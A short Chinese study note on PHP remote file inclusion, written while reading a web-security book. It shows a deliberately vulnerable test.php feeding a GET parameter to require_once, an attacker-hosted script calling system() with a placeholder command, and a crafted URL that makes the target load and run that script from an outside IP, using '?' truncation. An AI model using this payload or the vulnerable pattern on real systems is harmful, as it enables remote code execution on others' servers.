php遠程檔案包含截斷問題

標籤：link   error   命令   包含   無法   今天   自己   安全   weight   

今天在學習《白帽子講web安全》一書是，提到一個php遠程檔案包含漏洞

可以從攻擊者伺服器中的一個寫好的攻擊指令碼中遠程執行命令

伺服器中有漏洞的頁面代碼為：

#test.php
#error_reporting(0);$route="share";$basePath=$_GET[‘param‘];if ($route == "share"){    require_once $basePath.‘/action/mshare.php‘;}elseif ($route == "sharelink"){    require_once $basePath.‘/action/m_shareliink.php‘;}

攻擊者伺服器中的攻擊指令碼為：

#test1.txt
<?phpsystem("ver;");  #此處可以自己定義要執行的命令?>

攻擊者可以構造如下url遠程調用攻擊者伺服器上的攻擊指令碼:

/test.php/?param=http://23.105.202.153/test.txt?

最後的問號會截斷require_once在$basePath參數後的字串

 

這裡有一個問題，就是攻擊者的攻擊指令碼只能儲存為txt格式，而不能儲存為php格式，否則會導致攻擊指令碼無法在受害者機器上運行。

還有一個問題需要解決，就是無法向攻擊者編寫的指令碼傳遞參數，如果攻擊者指令碼加入了參數，則會導致無法截斷，這一問題需要解決。

php遠程檔案包含截斷問題